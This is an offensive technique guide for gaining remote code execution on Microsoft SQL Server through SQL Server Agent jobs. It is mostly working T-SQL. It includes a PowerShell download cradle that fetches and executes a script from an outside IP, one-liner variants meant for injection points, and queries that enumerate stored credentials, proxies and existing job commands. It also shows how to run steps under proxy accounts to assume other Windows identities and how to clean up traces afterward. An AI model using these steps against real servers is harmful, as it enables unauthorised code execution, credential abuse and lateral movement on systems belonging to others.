Use SQL Server Agent jobs for RCE when xp_cmdshell is disabled (or re-enabling it would be too noisy). The Agent service must be running, and running CmdExec or PowerShell steps without a proxy account requires sysadmin.
Jobs are comparable to scheduled tasks and are intended for database admins to automate work on the database server.
Each job step runs in a subsystem; among them are the CmdExec and PowerShell subsystems, which execute OS commands and PowerShell scripts respectively, by default as the SQL Server Agent service account.
- create the job with sp_add_job, add a CmdExec or PowerShell step with sp_add_jobstep, and target the local server with sp_add_jobserver (without that last call the job is never scheduled)
- use the sp_start_job stored procedure to start the job immediately (it returns as soon as the Agent is notified, so check msdb.dbo.sysjobhistory for the outcome)
- remove any jobs you created with the sp_delete_job stored procedure
RCE via Job
Full Script:
USE msdb;
GO
-- create the job container
EXEC sp_add_job
@job_name = N'Malicious Job';
GO
-- add a PowerShell step; the command is a download cradle that fetches and runs a remote script
EXEC sp_add_jobstep
@job_name = N'Malicious Job',
@step_name = N'Execute PowerShell Script',
@subsystem = N'PowerShell',
@command = N'(New-Object Net.WebClient).DownloadString("http://10.10.14.104/a")|IEX;',
@retry_attempts = 5,
@retry_interval = 5;
GO
-- target the local server (no @server_name means "(local)")
EXEC sp_add_jobserver
@job_name = N'Malicious Job';
GO
-- run it now rather than waiting for a schedule
EXEC sp_start_job
@job_name = N'Malicious Job';
GO
Build with one-liners (handy when each statement has to go through an injection point or a one-shot client):
EXEC msdb.dbo.sp_add_job @job_name='poc_job';
EXEC msdb.dbo.sp_add_jobstep @job_name='poc_job',@step_name='poc',@subsystem='CMDEXEC',@command='cmd /c whoami > C:\agent.txt';
EXEC msdb.dbo.sp_add_jobserver @job_name='poc_job';
EXEC msdb.dbo.sp_start_job @job_name='poc_job';
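The full lifecycle from the steps above, as an added example that is not part of the original notes: pre-flight checks for rights and a running Agent, a CmdExec step whose output is captured to a file, a poll of the job history for the result, and the sp_delete_job cleanup. The job name, output path and command are assumptions chosen for illustration.

```sql
-- Added example (not from the original notes). Job/step names, the output
-- path and the command are assumptions for illustration.
USE msdb;
GO

-- 1. Pre-flight. Only sysadmin can run CmdExec/PowerShell steps without a
--    proxy; SQLAgentUserRole members can create jobs but not those steps.
SELECT IS_SRVROLEMEMBER('sysadmin')  AS is_sysadmin,
       IS_MEMBER('SQLAgentUserRole') AS is_agent_user;   -- evaluated in msdb
-- sp_start_job fails if the Agent service is stopped (needs VIEW SERVER STATE).
SELECT servicename, status_desc, service_account
FROM sys.dm_server_services
WHERE servicename LIKE N'SQL Server Agent%';
GO

-- 2. Create the job; step output is redirected to a file so it can be read back.
EXEC sp_add_job @job_name = N'poc_job';
EXEC sp_add_jobstep
    @job_name         = N'poc_job',
    @step_name        = N'poc',
    @subsystem        = N'CmdExec',
    @command          = N'whoami /all',
    @output_file_name = N'C:\Windows\Temp\poc_job.txt',  -- assumed path
    @flags            = 0;   -- 0 = overwrite the output file, 2 = append to it
EXEC sp_add_jobserver @job_name = N'poc_job';   -- local server by default
EXEC sp_start_job     @job_name = N'poc_job';   -- returns before the step runs
GO

-- 3. Poll for the outcome. sysjobhistory only gets a row once the step ends;
--    run_status: 0 failed, 1 succeeded, 2 retry, 3 cancelled, 4 in progress.
WAITFOR DELAY '00:00:05';
SELECT j.name, a.start_execution_date, a.stop_execution_date,
       h.run_status, h.message          -- message starts with "Executed as user: ..."
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobactivity a ON a.job_id = j.job_id
LEFT JOIN msdb.dbo.sysjobhistory h ON h.job_id = j.job_id AND h.step_id = 1
WHERE j.name = N'poc_job';
GO

-- 4. Read the captured output. The file was written by the Agent service
--    account and is read here by the SQL Server service account, so both
--    need access to the path; OPENROWSET(BULK) needs ADMINISTER BULK OPERATIONS.
SELECT BulkColumn AS step_output
FROM OPENROWSET(BULK N'C:\Windows\Temp\poc_job.txt', SINGLE_CLOB) AS o;
GO

-- 5. Cleanup: sp_delete_job removes the job, its steps and its history rows.
EXEC sp_delete_job @job_name = N'poc_job';
GO
```

The history message is worth keeping even when you capture output to a file: it records the identity the step ran under, which is what you compare against the Agent service account and any proxy you later choose.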
Enumerate credentials, proxies and existing jobs (a proxy lets a step run as the Windows account behind a stored credential instead of the Agent service account; existing job steps may already contain reusable commands or secrets):
SELECT * FROM msdb.dbo.syscredentials;
SELECT p.proxy_id,p.name,c.name FROM msdb.dbo.sysproxies p LEFT JOIN msdb.dbo.syscredentials c ON p.credential_id=c.credential_id;
SELECT j.job_id,j.name,s.step_id,s.subsystem,s.command FROM msdb.dbo.sysjobs j JOIN msdb.dbo.sysjobsteps s ON j.job_id=s.job_id;
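Using what the enumeration queries return, as an added example that is not part of the original notes: list only the proxies that are enabled and granted to the CmdExec or PowerShell subsystem, run a step under one of them, and confirm from the job history which identity actually executed it. The proxy name, job name and output path are assumptions; the credential view used here is the server-level sys.credentials catalog view.

```sql
-- Added example (not from the original notes). Proxy name, job name and
-- output path are assumptions for illustration.
USE msdb;
GO

-- 1. A proxy is usable for a step only if it is enabled and granted to that
--    step's subsystem (msdb.dbo.sysproxysubsystem). Non-sysadmin job owners
--    additionally need a grant in msdb.dbo.sysproxylogin; sysadmins can use any.
SELECT p.proxy_id, p.name AS proxy_name,
       c.credential_identity,          -- the Windows account the step would run as
       ss.subsystem
FROM msdb.dbo.sysproxies p
JOIN sys.credentials c            ON c.credential_id  = p.credential_id
JOIN msdb.dbo.sysproxysubsystem ps ON ps.proxy_id     = p.proxy_id
JOIN msdb.dbo.syssubsystems ss     ON ss.subsystem_id = ps.subsystem_id
WHERE p.enabled = 1
  AND ss.subsystem IN (N'CmdExec', N'PowerShell');
GO

-- 2. Run a CmdExec step under the chosen proxy instead of the Agent account.
--    sp_add_jobstep fails if the proxy is not granted to the CmdExec subsystem.
EXEC sp_add_job     @job_name = N'poc_proxy_job';
EXEC sp_add_jobstep
    @job_name   = N'poc_proxy_job',
    @step_name  = N'whoami',
    @subsystem  = N'CmdExec',
    @command    = N'cmd /c whoami /all > C:\Windows\Temp\poc_proxy.txt',  -- assumed path
    @proxy_name = N'ExampleProxy';   -- assumed; pick one returned by the query above
EXEC sp_add_jobserver @job_name = N'poc_proxy_job';
EXEC sp_start_job     @job_name = N'poc_proxy_job';
GO

-- 3. Confirm the identity. For CmdExec/PowerShell steps the history message
--    begins with "Executed as user: <account>", so it should now name the
--    proxy's credential_identity rather than the Agent service account.
WAITFOR DELAY '00:00:05';
SELECT h.run_status, h.run_date, h.run_time, h.message
FROM msdb.dbo.sysjobhistory h
JOIN msdb.dbo.sysjobs j ON j.job_id = h.job_id
WHERE j.name = N'poc_proxy_job' AND h.step_id = 1;
GO

-- 4. What a defender sees: jobs created recently, by whom, and with which
--    proxy. Clean up afterwards with sp_delete_job.
SELECT j.name, j.date_created, SUSER_SNAME(j.owner_sid) AS owner,
       s.subsystem, s.command, p.name AS proxy_name
FROM msdb.dbo.sysjobs j
JOIN msdb.dbo.sysjobsteps s ON s.job_id = j.job_id
LEFT JOIN msdb.dbo.sysproxies p ON p.proxy_id = s.proxy_id
WHERE j.date_created > DATEADD(day, -1, GETDATE())
ORDER BY j.date_created DESC;

EXEC sp_delete_job @job_name = N'poc_proxy_job';
GO
```

The last query is also the one to run against a target before creating anything: a proxy-backed step that already exists in someone else's job may give you the identity you want without adding a new job at all.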